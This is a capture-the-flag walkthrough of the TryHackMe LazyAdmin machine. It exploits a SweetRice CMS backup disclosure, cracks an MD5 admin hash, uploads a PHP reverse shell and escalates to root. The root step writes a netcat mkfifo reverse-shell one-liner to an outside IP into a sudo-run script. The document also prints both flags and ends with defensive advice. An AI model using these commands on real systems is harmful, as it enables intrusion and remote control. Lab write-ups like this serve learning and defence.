Easy linux machine to practice your skills
Challenge URL: https://tryhackme.com/r/room/lazyadmin
Task - Lazy Admin
Have some fun! There might be multiple ways to get user access.
Note: It might take 2-3 minutes for the machine to boot
Answer the questions below
- What is the user flag?
2. What is the root flag?
Target IP Address: 10.10.153.54
Goal: Find two things — 1. The user flag, 2. The root flag.
part 1 User Flag
Step 1: Target Scanning
Objective: Identify open ports and services on the target machine to assess potential vulnerabilities.
Tool Used: Nmap
nmap -Pn -sC -sV -oN ./lazyadmin.nmap Target_IP- -Pn: Skip ping check and assume host is up.
- -sC: Use Nmap’s default scripts to scan for vulnerabilities.
- -sV: Detect version information of services running on open ports.
- -oN: Save scan results to a file.
Open the file lazyadmin.nmap to review the results
cat ./lazyadmin.nmap
Findings:
- Port 22 (SSH): OpenSSH 7.2p2 (Ubuntu). Potential entry point via SSH if credentials or vulnerabilities are found.
- Port 80 (HTTP): Apache HTTPD 2.4.18. Web server running default configuration. Explore for potential hidden directories or misconfigurations.
Next Step:
Investigate the web server running on Port 80 to uncover hidden content and directories.
Step 2: Investigating the Website
- Objective: Explore the HTTP service to uncover additional information or vulnerabilities.
http://Target_IP:PORT
Findings:
- The default Apache2 Ubuntu Default Page is active, indicating no immediate custom content.
Next Step:
Step 3: Use Gobuster to brute-force discover hidden directories or files.
gobuster dir -u http://Target_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Findings:
- /content (301 — Redirected)
- /server-status (403 — Forbidden)
Use Gobuster Again to discover more hidden directories
gobuster dir -u http://Target_IP/content -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Findings:
Additional directories that have been discovered during the scan of http://10.10.153.54/content/:
- /images — Status: 301, redirecting.
- /js — Status: 301, redirecting.
- /inc — Status: 301, redirecting.
- /as — Status: 301, redirecting.
- /_themes — Status: 301, redirecting.
- /attachment — Status: 301, redirecting.
However, there are also several context deadline exceeded errors that indicate a timeout occurred when attempting to access some of the content, such as:
- /s_download
- /126233
- /27308
- /19446
- /foremost
- /69494
Step 4: Investigating the /content Directory
Objective: Investigate the /content directory for CMS-related vulnerabilities.
http://Target_IP:PORT/content
Findings:
The SweetRice CMS is identified, as a known vulnerable content management system.
Next Step:
Step 5: Search for vulnerabilities in SweetRice CMS by consulting Exploit-DB.
Search for SweetRich
https://www.exploit-db.com/
SweetRiceFindings:
Key Vulnerabilities Found for SweetRice:
Backup Disclosure (SweetRice 1.5.1):
- Vulnerability allows attackers to access backup files stored on the server, potentially exposing sensitive information.
Arbitrary File Upload (SweetRice 1.5.1):
- This allows attackers to upload any file to the server, including malicious scripts (such as PHP shells), which could give them control over the server.
Cross-Site Request Forgery (CSRF) / PHP Code Execution (SweetRice 1.5.1):
- This vulnerability could allow attackers to execute arbitrary PHP code on the server by tricking authenticated users into performing unwanted actions.
Arbitrary File Download (SweetRice 1.5.1):
- This allows attackers to download any file from the server, which could lead to data exposure.
Multiple Vulnerabilities (SweetRice 0.6.7):
- This version had multiple vulnerabilities that could be exploited, but details are not specified in this image.
Remote File Inclusion (SweetRice 0.5.3):
- Allows remote inclusion of files from another server, potentially leading to the execution of malicious scripts.
Vulnerability that can be used Backup Disclosure vulnerability in SweetRice 1.5.1.
Findings:
- Title: SweetRice 1.5.1 — Backup Disclosure
- EDB-ID: 40718
- Description: This vulnerability allows unauthorized access to backup files created by the SweetRice CMS. These backups may include sensitive data like MySQL database backups or website files.
- Affected Versions: SweetRice 1.5.1 and earlier.
- Proof of Concept:
You can access to all mysql backup and download them from this directory.
http://localhost/inc/mysql_backup
and can access to website files backup from:
http://localhost/SweetRice-transfer.zip
Step 6: Exploiting the SweetRice CMS Backup Disclosure Vulnerability
Objective: Exploit the Backup Disclosure Vulnerability in SweetRice to retrieve sensitive data.
http://TARGET_IP/inc/mysql_backup
Findings:
The “Not Found” error indicates that the /inc/mysql_backup directory does not exist on the target server, or it may have been moved or deleted. It’s also possible that the directory structure has been modified, or the backup disclosure vulnerability has been patched.
Since we discovered that /content is a directory on the server, will try accessing the backup path within the /content directory
http://Target_IP/content/inc/mysql_backup
Findings:
Discovered a MySQL backup file: mysql_backup_20191129023059–1.5.1.sql
Next Step:
Step 7: Download the backup file and extract sensitive information.
wget http://Target_IP/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql
Next Steps
Step 8: View the contents of the SQL File
cat mysql_backup_20191129023059-1.5.1.sql
Findings:
Sensitive Information
- Hashed password for the administrator or manager of the website.
's:6:"passwd";s:32:"42f749ade7f9e195bf475f37a44cafcb"';- s:6:”passwd” — This means the field is storing a password.
- s:32 — This shows the length of the hash (32 characters), which is typical for an MD5 hash (which is a weak hashing algorithm).
- “42f749ade7f9e195bf475f37a44cafcb” — This is the actual MD5 hash of the password.
Next Step:
Step 9: Use CrackStation to crack the MD5 hash.
https://crackstation.net/Findings:
The MD5 hash was successfully cracked using CrackStation, and the result shows the password is “Password123”.
Step 10: Getting User Access
Navigate to http://Target_IP/content/as
http://Target_IP/content/asUnder the /as directory, we find a login page, login by using the certificate that were found
Account:manager
Password:Password123
After logging into the admin area, explore the admin panel to see if we can upload file, such as a reverse shell. A reverse shell lets us control the machine from our own computer.
Download the PHP reverse shell from GitHub (PentestMonkey’s reverse shell):
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.phpModify the Script to Set Attacker_IP and Port using text editor
nano php-reverse-shell.phpInside the script, you’ll find these lines
$ip = ‘127.0.0.1’; // CHANGE THIS
$port = 1234; // CHANGE THIS
You need to replace the placeholder values with:
- Attacker IP Address: This is the IP address of the attacker machine where you’ll be listening for the connection.
- Port Number: This is the port number the attacker listens on
Save the file by pressing CTRL+X to exit, then press Y to confirm the save, and Enter.
Rename the file to bypass certain upload restrictions, using a different extension
mv php-reverse-shell.php shell.phtmlUpload the File to SweetRice
In SweetRice admin panel go to the “Media Center” and uploadphp-shell.phtml file
Need to set up a “listener” on the attacker machine to catch any incoming connections from the target machine.
nc -lvnp 4444Trigger the reverse-shell by clicking on the uploaded file and we got a shell
Upgrade the Shell to a better shell environment
python -c 'import pty; pty.spawn("/bin/bash")'Listed files navigated to the /home directory and listed the contents
ls
cd home
ls
cd itguy
ls
cat /home/user/user.txtUser Flag: THM{63e5bce9271952aad1113b6f1ac28a07}
Part 2 : Root Flag
Privilege Escalation to Root
Objective: Elevate privileges to gain full control (root access).
sudo -lFindings:
The user www-data can run /usr/bin/perl /home/itguy/backup.pl with root privileges without needing a password.
Next Step:
Examine the backup.pl script
cat /home/itguy/backup.plThe content of the backup.pl Perl script you’ve provided shows that it runs a shell script located at /etc/copy.sh. This is a key vulnerability, as you can modify or replace the contents of copy.sh to execute arbitrary commands as root.
Next check the contents of the copy.sh file
cat /etc/copy.shFindings:
The script calls another file, /etc/copy.sh, which contains a vulnerable reverse shell.
Next Step:
Modify copy.sh to connect back to the attacker’s IP address.
Since the attacker IP address is 10.2.7.247/17, will need to modify the reverse shell script (/etc/copy.sh) to connect back to this new IP address instead of the previous one 192.168.0.190
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.2.7.247 5554 > /tmp/f" > /etc/copy.shSet up a listener on attacer Machine
nc -nvlp 5554Run the the modified Perl script on the Target Machine with root privileges
sudo /usr/bin/perl /home/itguy/backup.pl
Root Shell Obtained.
Access the root directory and capture the root flag
ls /root
cd /root
ls
cat root.txtRoot Flag: THM{6637f41d0177b6f37cb20d775124699f}
Results:
- User flag: THM{63e5bce9271952aad1113b6f1ac28a07}
- Root flag: THM{6637f41d0177b6f37cb20d775124699f}
Was successful in identifying and exploiting vulnerabilities in the SweetRice CMS, allowing full control over the target machine and retrieval of both user and root flags.
how to prevent the type of attack that happened in the LazyAdmin challenge
1. Keep Software Updated (Patching)
Always update your software and apply security patches as soon as possible. Many attacks happen because vulnerabilities aren’t fixed. For example, the SweetRice CMS had a known vulnerability that was used in this attack.
2. Protect Backup Files
Make sure backup files (like MySQL database backups) are not accessible to the public. Keep them in folders that only specific users can access. These backup files should not be accessible without proper authentication.
3. Limit User Permissions (Least Privilege)
Only give users the minimum access they need. In this attack, the user www-data could run a script with root permissions, which was a big problem. You should limit such permissions to avoid this kind of issue.
4. Strengthen Servers and Network Protection
Use additional protection such as firewalls (to block unauthorized access), IDS/IPS (Intrusion Detection/Prevention Systems), and close unused ports. For example, SSH (port 22) was open in this attack and could have been restricted to trusted IPs.
5. Enable Two-Factor Authentication (2FA)
Use two-factor authentication (2FA) to add an extra layer of security, making it harder for attackers to access accounts even if they steal a password.
6. Regular Vulnerability Scanning
Use tools like Nmap, OpenVAS, or Nessus to regularly scan for vulnerabilities in your system. This helps you find security issues before attackers do.
7. Use Strong Passwords
Ensure passwords are strong and not easily cracked. In this attack, the password used MD5, which is a weak encryption algorithm. It’s better to use stronger methods like bcrypt or SHA-256, with salting (adding random data to make cracking harder).
8. Control File Uploads
Be careful with file uploads on your website. In this attack, a malicious file (PHP reverse shell) was uploaded. You should limit the types of files that can be uploaded, especially ones that could run on the server (like .php).
Example of What Could Happen Without Protection:
If software is not updated, attackers can easily find known vulnerabilities and exploit them.
If backups are not protected, attackers can download them and find sensitive information like passwords.
If user permissions are not limited, attackers can gain full control over the system after accessing a vulnerable account.
Conclusion:
By keeping software updated, limiting user access, securing backup files, using 2FA, and regularly scanning for vulnerabilities, you can prevent many types of cyberattacks. It’s important to follow these steps to keep your systems safe.
